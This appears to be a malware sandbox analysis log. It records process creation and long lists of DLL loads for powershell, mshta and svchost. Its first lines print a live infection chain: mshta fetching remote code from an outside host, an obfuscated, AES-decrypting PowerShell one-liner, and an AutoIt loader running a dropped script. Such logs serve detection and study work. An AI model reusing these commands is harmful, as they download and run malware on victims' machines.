Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuck
Source: C:\Windows\System32\mshta.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function tCqzac($xDlOy){return -split ($xDlOy -replace '..', '0x$& ')};$SQYQyiT = tCqzac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kCTD = [System.Security.Cryptography.Aes]::Create();$WkCTD.Key = tCqzac('7151766748794165544D79435557754
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Users\user\AppData\Roaming\AutoIt3.exe "C:\Users\user\AppData\Roaming\AutoIt3.exe" "C:\Users\user\AppData\Roaming\DesolateOxidant.a3x"
Source: C:\Windows\regedit.exe; Section loaded: authz.dll
Source: C:\Windows\regedit.exe; Section loaded: aclui.dll
Source: C:\Windows\regedit.exe; Section loaded: ulib.dll
Source: C:\Windows\regedit.exe; Section loaded: clb.dll
Source: C:\Windows\regedit.exe; Section loaded: uxtheme.dll
Source: C:\Windows\regedit.exe; Section loaded: ntdsapi.dll
Source: C:\Windows\regedit.exe; Section loaded: xmllite.dll
Source: C:\Windows\regedit.exe; Section loaded: duser.dll
Source: C:\Windows\regedit.exe; Section loaded: atlthunk.dll
Source: C:\Windows\regedit.exe; Section loaded: textshaping.dll
Source: C:\Windows\regedit.exe; Section loaded: kernel.appcore.dll
Source: C:\Windows\regedit.exe; Section loaded: textinputframework.dll
Source: C:\Windows\regedit.exe; Section loaded: coreuicomponents.dll
Source: C:\Windows\regedit.exe; Section loaded: coremessaging.dll
Source: C:\Windows\regedit.exe; Section loaded: ntmarta.dll
Source: C:\Windows\regedit.exe; Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: linkinfo.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: ntshrui.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: cscapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: policymanager.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: taskflowdataengine.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: cdp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: umpdc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: dsreg.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: netutils.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: mshtml.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: iertutil.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: sspicli.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: powrprof.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: winhttp.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: wkscli.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: netutils.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: umpdc.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: urlmon.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: srvcli.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: msiso.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: uxtheme.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: srpapi.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: wininet.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: windows.storage.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: profapi.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: mswsock.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: iphlpapi.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: winnsi.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: ieframe.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: netapi32.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: version.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: userenv.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: msimtf.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: dnsapi.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: dxgi.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: textinputframework.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: coremessaging.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: ntmarta.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: coremessaging.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: wintypes.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: imgutil.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: mlang.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exe  Section loaded: rasadhlp.dll
      Source: C:\Windows\System32\svchost.exe  Section loaded: fwpuclnt.dll
      Source: C:\Windows\System32\svchost.exe  Section loaded: rmclient.dll
      Source: C:\Windows\System32\svchost.exe  Section loaded: usermgrcli.dll
      Source: C:\Windows\System32\svchost.exe  Section loaded: execmodelclient.dll
      Source: C:\Windows\System32\svchost.exe  Section loaded: propsys.dll
      Source: C:\Windows\System32\svchost.exe  Section loaded: coremessaging.dll
      Source: C:\Windows\System32\svchost.exe  Section loaded: twinapi.appcore.dll
      Source: C:\Windows\System32\svchost.exe  Section loaded: onecorecommonproxystub.dll
      Source: C:\Windows\System32\svchost.exe  Section loaded: execmodelproxy.dll
      Source: C:\Windows\System32\svchost.exe  Section loaded: resourcepolicyclient.dll
      Source: C:\Windows\System32\svchost.exe  Section loaded: vssapi.dll
      Source: C:\Windows\System32\svchost.exe  Section loaded: vsstrace.dll
      Source: C:\Windows\System32\svchost.exe  Section loaded: samcli.dll
      Source: C:\Windows\System32\svchost.exe  Section loaded: samlib.dll
      Source: C:\Windows\System32\svchost.exe  Section loaded: es.dll
      Source: C:\Windows\System32\svchost.exe  Section loaded: bitsproxy.dll
      Source: C:\Windows\System32\svchost.exe  Section loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\System32\svchost.exe  Section loaded: dhcpcsvc6.dll
      Source: C:\Windows\System32\svchost.exe  Section loaded: dhcpcsvc.dll
      Source: C:\Windows\System32\svchost.exe  Section loaded: schannel.dll
      Source: C:\Windows\System32\svchost.exe  Section loaded: mskeyprotect.dll
      Source: C:\Windows\System32\svchost.exe  Section loaded: ntasn1.dll
      Source: C:\Windows\System32\svchost.exe  Section loaded: ncrypt.dll
      Source: C:\Windows\System32\svchost.exe  Section loaded: ncryptsslp.dll
      Source: C:\Windows\System32\svchost.exe  Section loaded: msasn1.dll
      Source: C:\Windows\System32\svchost.exe  Section loaded: cryptsp.dll
      Source: C:\Windows\System32\svchost.exe  Section loaded: rsaenh.dll
      Source: C:\Windows\System32\svchost.exe  Section loaded: dpapi.dll
      Source: C:\Windows\System32\svchost.exe  Section loaded: mpr.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: atl.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: mscoree.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: kernel.appcore.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: version.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cryptsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: rsaenh.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cryptbase.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: amsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: windows.storage.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wldp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: userenv.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: profapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: msasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: msisip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wshext.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: appxsip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: opcservices.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: gpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: secur32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: sspicli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: uxtheme.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: rasapi32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: rasman.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: rtutils.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: mswsock.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: winhttp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: iphlpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: dhcpcsvc6.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: dhcpcsvc.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: dnsapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: winnsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: rasadhlp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: fwpuclnt.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: schannel.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: mskeyprotect.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ntasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ncrypt.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ncryptsslp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: urlmon.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: iertutil.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: srvcli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: netutils.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: propsys.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wininet.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: kdscli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: edputil.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: windows.staterepositoryps.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wintypes.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: appresolver.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: bcp47langs.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: slc.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: sppc.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: onecorecommonproxystub.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: onecoreuapcommonproxystub.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: apphelp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: atl.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: mscoree.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: kernel.appcore.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: uxtheme.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: windows.storage.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wldp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: appresolver.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: bcp47langs.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: slc.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: userenv.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: sppc.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: propsys.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: linkinfo.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: profapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ntshrui.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: sspicli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: srvcli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cscapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: policymanager.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: msvcp110_win.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ntmarta.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: taskflowdataengine.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wintypes.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cdp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: umpdc.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: dsreg.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cryptsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: onecorecommonproxystub.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: version.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: rsaenh.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cryptbase.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: amsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: msasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: msisip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wshext.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: appxsip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: opcservices.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: gpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: secur32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: netutils.dll
      Source: C:\Windows\System32\mshta.exe  Section loaded: wldp.dll
      Source: C:\Windows\System32\mshta.exe  Section loaded: mshtml.dll
      Source: C:\Windows\System32\mshta.exe  Section loaded: iertutil.dll
      Source: C:\Windows\System32\mshta.exe  Section loaded: sspicli.dll
      Source: C:\Windows\System32\mshta.exe  Section loaded: powrprof.dll
      Source: C:\Windows\System32\mshta.exe  Section loaded: winhttp.dll
      Source: C:\Windows\System32\mshta.exe  Section loaded: wkscli.dll
      Source: C:\Windows\System32\mshta.exe  Section loaded: netutils.dll
      Source: C:\Windows\System32\mshta.exe  Section loaded: umpdc.dll
      Source: C:\Windows\System32\mshta.exe  Section loaded: urlmon.dll
      Source: C:\Windows\System32\mshta.exe  Section loaded: srvcli.dll
      Source: C:\Windows\System32\mshta.exe  Section loaded: kernel.appcore.dll
      Source: C:\Windows\System32\mshta.exe  Section loaded: msiso.dll
      Source: C:\Windows\System32\mshta.exe  Section loaded: uxtheme.dll
      Source: C:\Windows\System32\mshta.exe  Section loaded: srpapi.dll
      Source: C:\Windows\System32\mshta.exe  Section loaded: wininet.dll
      Source: C:\Windows\System32\mshta.exe  Section loaded: windows.storage.dll
      Source: C:\Windows\System32\mshta.exe  Section loaded: wldp.dll
      Source: C:\Windows\System32\mshta.exe  Section loaded: profapi.dll
      Source: C:\Windows\System32\mshta.exe  Section loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\System32\mshta.exe  Section loaded: mswsock.dll
      Source: C:\Windows\System32\mshta.exe  Section loaded: iphlpapi.dll
      Source: C:\Windows\System32\mshta.exe  Section loaded: winnsi.dll
      Source: C:\Windows\System32\mshta.exe  Section loaded: ieframe.dll
      Source: C:\Windows\System32\mshta.exe  Section loaded: netapi32.dll
      Source: C:\Windows\System32\mshta.exe  Section loaded: version.dll
      Source: C:\Windows\System32\mshta.exe  Section loaded: userenv.dll
      Source: C:\Windows\System32\mshta.exe  Section loaded: dpapi.dll
